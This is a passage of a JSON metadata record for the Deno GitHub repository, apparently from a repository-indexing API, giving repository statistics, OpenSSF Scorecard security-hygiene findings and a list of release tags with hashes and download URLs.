JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repo